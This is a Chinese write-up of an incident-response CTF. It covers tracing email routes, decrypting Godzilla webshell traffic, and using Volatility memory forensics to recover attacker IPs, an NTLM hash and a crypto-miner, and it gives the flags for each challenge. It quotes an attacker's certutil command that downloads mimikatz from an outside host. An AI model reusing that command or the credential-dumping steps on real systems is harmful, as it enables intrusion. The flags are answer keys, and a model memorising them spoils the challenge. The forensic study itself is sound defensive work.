2024第一届Solar杯应急响应挑战赛WP

Yikjiang2025-01-03文章来源:SecHub网络安全社区


一、内存取证

1、签到

1735351556419f998a8e9eb3a48919e70a7554c583a68.png

根据邮件的收发顺序,以下是邮服的发件顺序: 邮件发件服务器: mail.solar.sec IP地址: 127.0.0.1(本地邮件服务器) 邮件传输协议: ESMTP (通过Postfix) 发送时间: Thu, 17 Oct 2024 11:24:01 +0800 中继邮件服务器: mail.da4s8gag.com IP地址: 140.143.207.229 邮件传输协议: SMTP 发送时间: Thu, 17 Oct 2024 11:24:01 +0800 最终接收服务器: newxmmxszc6-1.qq.com (QQ邮箱服务器) 邮件传输协议: SMTP 接收时间: Thu, 17 Oct 2024 11:24:01 +0800 因此,发件顺序为: mail.solar.sec → mail.da4s8gag.com → newxmmxszc6-1.qq.com

按照题目要求的flag格式,答案为:

flag{mail.solar.sec|mail.da4s8gag.com|newxmmxszc6-1.qq.com}

日志流量

一、日志流量一

1、将题目内容放到D盾,发现后门

17353520842412352298061df4b289276e69b48955c00.png

2、发现字符串,解密后获取flag

173535209458906d118393909447dba72b68144c350c5.png

17353521010797cd46763a5494b16aa42be8c958e76e9.png

flag{A7b4_X9zK_2v8N_wL5q4}

二、日志分析二

1、Webshell类型为哥斯拉,爆破出密钥为a2550eeab0724a69

17353736772025446490c53c34caf91dfb799955d6f49.png

2、对返回包进行解密发现flag

1735373684181c60dc318a03045aea2b1f50536595215.png

flag{sA4hP_89dFh_x09tY_lL4SI4}

内存取证

内存取证1

1、使用volatility工具查看端口。

.\volatility.exe -f .\SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 netscan

1735354281649b089e36a6d14475aac9b6a2128af6021.png

17353542895837c55635ff07a4979966a15b0aa601997.png

内存取证2

1、volatility查看历史命令

.\volatility.exe -f .\SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 cmdscan

2、发现敏感操作,提取Hack IP

certutil -urlcache -split -f http://155.94.204.67:85/mimikatz.exe C:\Windows\Temp\mi.exe

17353541337375b029edfdfcb4f12b996eb8dc8c0dc81.png

flag{155.94.204.67}

内存取证3

1、根据第二题的历史命令,发现pass.txt文件

17353541337375b029edfdfcb4f12b996eb8dc8c0dc81.png

2、查看pass.txt的偏移量,获取Flag

17353691760836d1c5b7c0d2544c2a528c64e68889c42.png

dumpfiles -Q 0x000000007e4cedd0 -D

1735369121390db7b8303600b4680befe5e6b9e80c7d2.png

flag{GalaxManager_2012}

内存取证4

1、利用volatility插件hashdump读取密码

.\volatility.exe -f .\SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 hashdump

1735353938486e3ec64e50e444d7a8460b8435c9e6e19.png

flag{ASP.NET}

内存取证5

1、MemProcFS导出日志文件,分析日志

1735370908602bc8a1c8637194951bfd446e8699ce4c1.png

2、发现远程登录日志,根据Flag格式修改,提交flag

flag{2024/12/21 00:15:34}

内存取证6

1、在内存取证4中即可看出来,将ASP.NET的用户hash值用flag{}包裹

1735353938486e3ec64e50e444d7a8460b8435c9e6e19.png

flag{5ffe97489cbec1e08d0c6339ec39416d}

数据库

1、使用大白菜修改密码,这里修改为admin。

173536192876867e5eab6cefe4b7386cde7b3b8dd2893.png

2、导入大白菜镜像

1735374521980afb909c3672440ce928079acc115259c.png

3、修改密码后成功进入系统,即可导入日志分析工具进行分析

1735361933143b5cc212b00a948d487e30d95c487f9d8.png

数据库1

1、这里可以使用多种方式查看,我这里查看了用户设置密码的时间,也就相当初创建时间

net user test$

173536269668501759330f47a46a3a629f2b196d209b4.png

2、获得Flag

flag{2024/12/16 15:24:21}

数据库2

1、上传火绒剑查看网络连接情况,发现XMR门罗币挖矿木马病毒

1735362444067594dcf50500d4551bdc1805f6de0fe92.png

2、提交Flag

flag{xmrig.exe}

数据库3

1、依旧是根据火绒剑,获取外联IP

1735362444067594dcf50500d4551bdc1805f6de0fe92.png

flag{203.107.45.167}

综合应急

综合应急1

直接提交即可

173537442511078188699ab4240b2991fc74c668bc9f6.png

flag{solar}

理论题

理论题部分结合日志分析工具及猜测作答。